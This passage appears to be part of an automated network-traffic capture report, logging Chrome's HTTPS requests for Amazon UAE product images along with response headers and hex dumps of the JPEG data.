                                                                                                                                                                                                        2024-08-15 13:38:02 UTC1378INData Raw: 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 41 04 d1 c6 f9 1e d8 e3 69 7c 8f 21 ac 63 46 49 27 90 00 04 4b 65 69 0e 06 df ae e1 b3 dd 24 fc 1d 4e 79 98 b1 ba 6c 7e 77 d1 67 cf 2e fc d5 53 26 ae b1 ca 39 ba 18 7b 3e d3 1b df e1 8f dd b8 f4 c7 01 74 95 23 5a 59 6e 15 8f fa 55 35 c7 78 3f 06 11 b4 fc 9a 16 89 c9 92 dd 67 65 a8 c7 86 9d 23 79 fb b3 5a 5e 17 69 58 47 3b 7d 13 7c a3 a4 81 bf 6e c2 54 70
                                                                                                                                                                                                        Data Ascii: Ai|!cFI'Kei$Nyl~wg.S&9{>t#ZYnU5x?ge#yZ^iXG;}|nTp
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC1378INData Raw: fb c7 2f e3 65 a2 36 3a 49 1a c6 fb cf 21 a3 e2 4e 15 d9 9d a3 77 99 c7 8e 6f 68 ac 75 99 d9 9a dc 9e da 4b 44 bb 79 06 47 d9 b3 e7 ec 85 c1 c1 1c 79 63 e7 bb ea dd a9 92 34 da 2b 6d f9 69 c3 1f fe b0 c2 17 7d f2 61 01 01 01 01 01 01 01 01 01 01 05 5c 16 7b b5 43 43 a9 e8 aa 26 69 e8 e8 e2 7b 87 d6 01 5a ad a8 c7 5e b6 ac 7d 61 94 52 d3 d2 12 d4 da ee 54 a3 75 4d 24 d0 0f 19 23 7b 07 ed 00 a6 99 a9 6e ed a2 7e a4 d2 63 ac 29 96 c6 22 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 08 20 d8 fc 19 d2 2f b9 de 5b 75 9a 32 e8 29 5e 19 4d 91 c9 d3 f5 cf ea 03 9f 89 1e 0a 9e b3 2f 0d 76 8e b2 e9 f6 6e 0e 2b 71 cf 4a ba c2 c3 69 8e 18 98 31 ec c7 cf e2 e5 53 16 3d a3 75 ad 46 5e 29 5f b1 92 b7 2b a6 52 22 10 0a 00 50 08 22 82 08 0a 43 92 08 61 40 61 48
                                                                                                                                                                                                        Data Ascii: /e6:I!NwohuKDyGyc4+mi}a\{CC&i{Z^}aRTuM$#{n~c)" /[u2)^M/vn+qJi1S=uF^)_+R"P"Ca@aH
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC1378INData Raw: 27 87 36 2d 5d 60 be 50 38 b6 b6 82 a2 9c 8f f9 48 de d1 f5 91 85 b6 2f 13 d2 5a 6d 8a d1 d6 25 41 82 3a 85 93 58 80 a4 10 32 81 94 04 11 40 44 08 08 08 22 80 80 80 80 80 80 80 80 80 81 dc 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 83 34 b2 54 8a bb 5c 61 fe d1 60 31 48 0f 97 2f ea ae 16 aa 9c 19 27 6f 9b ea 9d 85 a9 8d 46 8e bc 5c e6 3e 19 fa 7f c6 ca
                                                                                                                                                                                                        Data Ascii: '6-]`P8H/Zm%A:X2@D"4T\a`1H/'oF\>
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC1378INData Raw: 45 a7 c1 f2 bb e9 b3 6b f5 37 b6 3a ef 13 69 e7 e1 11 e1 cf e4 be 5b f4 cd 34 38 7d 51 ed e4 fc 9f a0 3e 5d ea 86 6d 75 ad ca bc a1 eb 3b 3b d9 6c 58 b6 b6 6f f1 2d e5 f9 7f e7 eb f6 54 57 5e e8 28 47 66 d2 24 91 bc 84 51 e3 03 e2 7a 05 ab 16 96 f9 39 f4 8f 35 dd 7f 6e e9 b4 91 c3 1f 15 a3 f2 d7 c3 e7 e1 1f cf a2 c3 36 a5 ba 3e 42 e6 3c 44 de e6 35 a0 fd a4 15 d2 ae 87 1c 47 3e 6f 1f 9f da 8d 5d ed bd 66 29 1e 51 11 fd 77 5a 95 b7 9d 10 10 10 10 74 1f 03 74 43 2d 96 61 a8 2b 23 ff 00 c2 17 26 ff 00 a3 6e 1c e3 a6 ea dc 79 c9 ef 7c 30 be 7f ed 2f 69 4e 5c 9e e6 b3 f0 53 af ad bf e3 f9 dd db d0 60 e1 af 14 f5 9f e1 b4 97 97 74 04 04 04 04 04 04 04 1a 37 8f 9a 32 2a 79 a1 d5 14 71 86 b6 a1 c2 0b 8b 5a 39 76 98 fc 5c bc bf 28 34 b5 de 78 f1 5e e3 d9 6e d1 9b
                                                                                                                                                                                                        Data Ascii: Ek7:i[48}Q>]mu;;lXo-TW^(Gf$Qz95n6>B<D5G>o]f)QwZttC-a+#&ny|0/iN\S`t72*yqZ9v\(4x^n
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC1378INData Raw: f3 cd 5a 16 4c 51 27 9a 80 ca 06 54 82 06 50 10 45 01 01 03 28 19 41 a5 b8 e9 a3 b5 1c fa 86 9b 54 5b 2d 6f bd 50 be 89 b4 15 b4 d0 03 25 45 39 8d e6 46 ca c8 f2 3d 83 9c 1d bc f2 b2 ac b1 b4 6f d5 53 c0 1d 17 a8 ad 75 97 ad 47 75 a3 7d ae 9a e7 0c 54 b4 54 13 0d b3 c8 23 71 71 9e 46 fd 1e b8 6e 79 a8 b1 5e 8d c2 b1 64 20 c7 35 c7 10 74 a6 88 b6 c1 72 d4 b5 2f a5 a5 a9 98 53 c0 62 89 d3 39 d2 63 71 f6 5b d0 06 8c 94 16 cb 4f 1a 38 4b 76 78 8e 8f 54 d1 b6 47 73 11 d4 97 53 b8 fc 3b 40 d0 54 6e cb 86 59 75 15 5d 05 c2 21 2d be b2 9e b6 27 7b b2 53 ca c9 01 f8 6d 25 4e e8 d9 ee e8 a6 6f bc c2 07 c1 10 90 94 04 13 65 01 48 8a 02 08 84 11 50 08 23 84 10 c0 40 41 05 21 84 0c 20 6d 41 0d a8 20 58 d7 75 19 41 69 be e9 7b 3d ea 8d f4 b7 1a 46 55 41 20 da e6 b8 0c
                                                                                                                                                                                                        Data Ascii: ZLQ'TPE(AT[-oP%E9F=oSuGu}TT#qqFny^d 5tr/Sb9cq[O8KvxTGsS;@TnYu]!-'{Sm%NoeHP#@A! mA XuAi{=FUA
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC1378INData Raw: 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 0b d5 bb 47 6a 0a f0 1f 1d 31 8a 23 d2 49 bf 16 3e a3 ed 1f 90 56 31 e9 72 5b c1 53 2e bb 15 3a ce f3 e8 bf 53 70 be a0 80 6a 6b d8 c3 de d8 d8 5f f6 b8 b3 ee 56 ab d9 f3 e3 2a 56 ed 78 f0 aa ac 70 c2 8b 1c eb a4 cf 8e c6 ff 00 8a cf ff 00 4f 8f 36 af fd 5e df a6 14 f3 f0 bd f8 26 9e e0 09 ee 6c 91 e3 ed 0e 3f 72 c2 dd 9f e5 2c eb da fe 75 fd d6 3b 86 86 d4 54 60 b8 40 2a 63 1d 5d 01 df fb 27 0e fb 15 7b e8 f2 57 c3 7f 92 e6 2e d0 c5 7f 1d be 6b 0b 98 e6 38 b5 e0 b5 cd 38 2d 23 04 15 5a 61 76 27 74 14 24 40 40 40 40 40 40 41 16 31 ef 78 63 1a 5c f7 72 0d 03 24 a4 cc 44 6f 2c a9 8e d7 98 ad 63 79 9f 08 5f 2d fa 5e 69 30 fa c7 76 4c ff 00 93 6f 37 1f 89 e8 17 3f 36 be 23 95 79 bd 6f 67 7b 29 92 fb 5b 3c f0 57
                                                                                                                                                                                                        Data Ascii: Gj1#I>V1r[S.:Spjk_V*VxpO6^&l?r,u;T`@*c]'{W.k88-#Zav't$@@@@@@A1xc\r$Do,cy_-^i0vLo7?6#yog{)[<W
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC1378INData Raw: de 7a b9 c7 25 74 6b 58 ac 6d 0f 21 9b 3d f2 db 8a f3 36 b4 f9 a4 52 d4 cb f4 c4 1d 9d b0 3c f5 99 c5 df 21 ec 8f b9 71 75 f7 df 26 de 4f a6 7b 2d a7 e0 d2 71 7e bb 4c ff 00 4f e8 c7 6b ab 1e eb b4 b5 4c 3c db 2e 58 7c 98 70 df b9 74 f1 62 8f 77 15 9f 27 88 d7 eb 66 75 b6 cd 5e b1 7e 5f fd bd 3f 86 57 5b 13 2e 16 a7 06 73 ed 58 1f 1f c7 de 0b 8f 8a d3 8f 27 3f 09 7d 17 5b 8a ba dd 1c f0 fe 7a ef 5f 9f 58 60 eb be f9 28 80 80 80 80 80 83 2e e1 35 dd b6 bd 7d 6a 96 47 6d 8a a1 e6 96 4f fa 76 96 37 f6 cb 4a e4 f6 ee 9f de e9 2f 11 d6 39 fd b9 ff 00 0b 3a 3b f0 e5 87 53 af 96 bd 10 80 80 80 80 80 80 80 83 ca a6 a2 1a 6a 79 6a 26 70 64 30 b1 d2 48 f3 d0 35 83 2e 3f 20 16 54 a4 da 62 23 ac a2 67 68 dd c7 57 7b 83 ee 57 6a db 84 9c 9f 59 3c 93 b8 78 19 1e 5d 8f
                                                                                                                                                                                                        Data Ascii: z%tkXm!=6R<!qu&O{-q~LOkL<.X|ptbw'fu^~_?W[.sX'?}[z_X`(.5}jGmOv7J/9:;Sjyj&pd0H5.? Tb#ghW{WjY<x]
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC1378INData Raw: 8b b7 69 35 45 77 64 ee d1 9d ac d2 17 67 77 7f 2c 28 91 88 f1 17 44 db 2d 17 e6 dd a9 e9 a8 59 4f 7e 9c 43 3c b5 16 a9 6f 75 32 57 4c e2 43 64 2f 79 10 d2 ed 18 21 80 60 f3 0a 50 cb 38 61 a2 6e ba 6a 9a 69 aa a5 34 31 57 30 3a 5d 31 0c ae a9 a2 a3 a9 6b 88 7c b4 93 49 f8 d6 c7 2b 43 5d d9 9e 4d 50 96 71 cd 04 72 50 49 24 71 4a dd b2 b1 af 6e 73 b5 c0 11 9f 14 1e 66 8a 8c c8 e9 3b 21 bd e3 0e 23 23 23 e0 3b fc d0 78 ba d5 1f 67 b6 39 a4 6b f3 90 f7 61 fc bf 24 82 39 84 12 c9 6e 97 b4 1d 9b d9 d9 1f 78 38 10 e0 7c b1 c8 a0 f1 75 15 58 63 dc 63 c9 69 e4 d6 38 1d c3 c5 b9 c7 d4 50 78 ba 39 9b d9 ee 63 da 65 f7 03 9a 7a f8 1c 67 07 e2 82 4e d3 05 cd c8 dc cf 7d b9 c1 1f 1c a6 e1 97 78 15 22 60 f5 02 60 e5 22 21 dc d4 09 b7 20 81 28 22 10 45 01 04 50 44 29 11
                                                                                                                                                                                                        Data Ascii: i5Ewdgw,(D-YO~C<ou2WLCd/y!`P8anji41W0:]1k|I+C]MPqrPI$qJnsf;!###;xg9ka$9nx8|uXcci8Px9cezgN}x"``"! ("EPD)
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC1378INData Raw: 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 0c cf 86 b6 a1 35 74 f7 19 06 5b 4c 36 45 9f cb 78 e6 7e 4d fb d7 43 41 8f 7b 4d bc 9c 9e d5 cd b5 62 91 e2 d8 cb aa e0 88 08 08 08 08 08 08 08 08 08 30 9e 25 da 84 94 90 5c 98 3d b8 5d d9 4a 7f 31 dc da 4f c1 df 7a e7 eb f1 ef 11 67 5f b2 b3 6d 69 a7 9f 36 bc 5c a7 74 40 40 40 40 40 40 41 59 69 af 65 0d 5f 6e f8 cc 9e c9 68 00 e3 19 ef 5a 35 18 67 25 76 89 d9 d4 ec 7e d0 ae 93 37 bc b5 78 b9 6d d7 f7 54 5f 2e d1 5c 1d 0f 64 1c d6 46 0e 43 b1 ef 1f 81 3e 0b 5e 93 4f 38 f7 df c5 73 b7 bb 5e 9a c9 a7 04 4c 45 62 7a f9 cf fe 16 b5 6d e7 c4 04
                                                                                                                                                                                                        Data Ascii: 5t[L6Ex~MCA{Mb0%\=]J1Ozg_mi6\t@@@@@@AYie_nhZ5g%v~7xmT_.\dFC>^O8s^LEbzm


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        48192.168.2.449832151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC691OUTGET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763815_372x232_2X_en_AE._SY116_CB558609315_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 2163
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 4841404d-ff63-47b3-8889-e42f6e4119d6
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 07 May 2024 08:31:11 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Sat, 16 Jul 2044 20:00:03 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 1469321
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:02 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kiad7000173-IAD, cache-ewr-kewr1740068-EWR
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 88 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 06 07 04 05 08 01 03 02 10 00 02 02 01 02 03 04 08 03 06 07 01 00 00 00 00 01 02 00 03 04 05 11 06 12 21 07 13 31 61 22 32 41 51 52 71 81 91 14 23 a1 33 34 42 a2 b2 c2 15 43 72 83
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1a"2AQRq#34BCr
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC785INData Raw: de 24 99 a8 4b 76 9c 7f 63 72 ba fe 3c 5f cf 4b 6b 44 ed 07 33 53 bd 71 ae cc c2 c4 b5 ce c9 55 d8 77 12 de 5c e3 2f 93 7f b0 79 39 b7 88 5f 4b 45 b7 51 7a 2c a0 b0 53 99 8c c4 0a d9 bc 05 b8 ec f6 38 53 f1 a5 96 ed e2 ca 00 26 54 5c 0b a5 e3 67 e7 9c fb b9 b9 b4 ee e5 eb e5 20 02 ce cc aa 1c 90 4e c0 fb 88 26 58 1d a6 70 dd 39 98 5f e2 0a 15 2d d3 cb 3e fd d8 26 d5 3b 21 52 7c 8e ce 0f 5f 09 4c f3 6a e6 d9 fa 79 ae 3e 3f 69 2b 22 ee d4 b4 1a d8 aa dd 6d be 75 e2 da 53 e8 cc a8 0c 27 6a 5a 13 7a d6 dc 9e 6d 8b 67 f6 86 9c b9 4b 59 8b 90 11 15 9a 8b 49 3e 74 b7 b7 a9 fe 12 7a ff 00 d7 5d f7 90 d4 fb 4c fd dd 3c fa b8 74 d6 2f 1c 68 79 7f b3 d4 29 1e 4e 4d 1f fa 04 92 8a 19 72 17 9e 96 16 2f c4 8c 1c 7d c1 22 72 25 ec a4 77 80 02 c9 d4 79 ed d7 94 ed b1 2a
                                                                                                                                                                                                        Data Ascii: $Kvcr<_KkD3SqUw\/y9_KEQz,S8S&T\g N&Xp9_->&;!R|_Ljy>?i+"muS'jZzmgKYI>tz]L<t/hy)NMr/}"r%wy*


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        49192.168.2.449833151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC691OUTGET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763856_372x232_2X_en_AE._SY116_CB558609315_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC659INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 3650
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 8ddc0acc-6b0f-4e55-a8a4-2058b88461d0
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 07 May 2024 08:31:11 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Mon, 02 May 2044 10:38:21 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 1741571
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:02 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kcgs7200132-IAD, cache-nyc-kteb1890035-NYC
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 9b 00 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 07 03 04 05 06 08 01 02 10 00 02 01 03 02 03 05 06 04 03 07 05 01 00 00 00 01 02 03 00 04 11 12 21 05 31 41 06 13 51 61 71 07 22 32 81 91 a1 14 23 42 b1 15 a2 b2 08 24 52 53 62 c1
                                                                                                                                                                                                        Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1AQaq"2#B$RSb
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC1378INData Raw: 79 aa e4 92 7c c9 f4 c5 6c c7 3e 26 be 24 85 66 42 8f 9c 1c 72 66 43 b1 cf c4 a5 58 7d 77 ab 88 14 2b 20 e8 08 af 91 ae 30 5a 89 dc ad 94 de e4 f6 c8 cb 8b f1 4b 91 79 70 b6 a2 3d 10 6d a1 94 fe 63 0d 9c ea 18 d3 be 54 7a 66 b2 96 77 69 79 12 4c 9b 06 ce 54 f3 56 1b 32 9f 4f b8 c1 ad 1e c7 89 ac cf 36 bf 8b bd 94 30 ea 18 31 0d f7 ac c7 67 65 fc eb b8 ff 00 4b 69 61 ea a7 43 7d 88 fa 54 34 66 49 db c9 2e cc 9f 2b 87 41 51 cf 05 a6 b4 6d 34 a5 2a f1 94 29 4a 50 0a 52 94 02 94 a5 00 a5 29 40 2b c6 60 80 b3 1c 2a 82 49 f0 03 73 5e d5 b5 ed b3 5c c4 f1 2b 05 d4 37 27 96 06 e7 7e 95 c5 96 4a 15 ca 50 5b 7d d1 d4 22 a5 24 9b d2 35 fb 49 1a 69 e4 b9 71 bc 8c 02 a9 fd 2a 15 5d 47 d3 ea 58 d6 5a c9 81 8b 42 9f fa 4c 57 e4 87 4a fd 85 60 f8 0f 1e e1 dc 62 35 6b 69
                                                                                                                                                                                                        Data Ascii: y|l>&$fBrfCX}w+ 0ZKyp=mcTzfwiyLTV2O601geKiaC}T4fI.+AQm4*)JPR)@+`*Is^\+7'~JP[}"$5Iiq*]GXZBLWJ`b5ki
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC894INData Raw: f1 04 15 3e 98 f7 b1 e5 51 3f 65 66 86 3b c4 12 cb 14 79 b5 60 ab 33 05 59 0b 3a 12 a3 24 67 65 e9 ca a5 48 61 ee 72 e8 23 41 d4 89 f2 9f 43 91 fb 57 b4 c5 5f 29 19 f9 6f e7 32 bc 6e ac 0e 92 4f 89 c6 9f ff 00 0a af b9 f8 6b 03 7f da 6e 17 60 01 bc e2 36 b1 78 07 b9 4c 9f fc 53 39 3f 73 5a 37 14 f6 cb d9 fb 25 6e ed a7 bb 3e 11 c4 51 7e 6f 2f 74 b8 f4 0d 56 54 5b ec 56 d9 57 b7 44 49 79 63 6e 0e 56 34 66 6f 36 76 eb e7 b6 6a d3 b2 d6 9a e4 ba bc 6f 1e ed 3e 58 67 fb e0 7c 8d 61 e0 e2 31 f6 85 ff 00 16 98 8d ae 84 65 22 ce a5 19 50 80 67 0b e1 86 d8 7c 35 22 5a db 25 ac 51 c2 9f 0c 6a 00 f3 ea 49 f3 63 92 7c cd 57 aa be 7b e5 37 d9 79 16 32 6f 55 63 42 a5 dd f9 b2 b5 29 4a ba 65 8a 52 94 02 94 a5 00 a5 29 40 29 4a 50 0a 8c 3d a5 c2 c0 f0 7b 90 36 8e 69 94
                                                                                                                                                                                                        Data Ascii: >Q?ef;y`3Y:$geHar#ACW_)o2nOkn`6xLS9?sZ7%n>Q~o/tVT[VWDIycnV4fo6vjo>Xg|a1e"Pg|5"Z%QjIc|W{7y2oUcB)JeR)@)JP={6i


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        50192.168.2.449834151.101.129.164434908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC691OUTGET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763818_372x232_2X_en_AE._SY116_CB558609315_.jpg HTTP/1.1
                                                                                                                                                                                                        Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                        Referer: https://www.amazon.ae/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-15 13:38:02 UTC659INHTTP/1.1 200 OK
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 2862
                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                        X-Amz-IR-Id: 722c6295-0f4d-4b4d-92c8-1d2114305dfb
                                                                                                                                                                                                        Cache-Control: max-age=630720000,public
                                                                                                                                                                                                        Last-Modified: Tue, 07 May 2024 08:31:11 GMT
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Expires: Mon, 02 May 2044 10:38:22 GMT
                                                                                                                                                                                                        X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Age: 1198757
                                                                                                                                                                                                        Date: Thu, 15 Aug 2024 13:38:02 GMT
                                                                                                                                                                                                        X-Served-By: cache-iad-kcgs7200168-IAD, cache-nyc-kteb1890088-NYC
                                                                                                                                                                                                        Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                        X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                        Server-Timing: provider;desc="fy"
                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
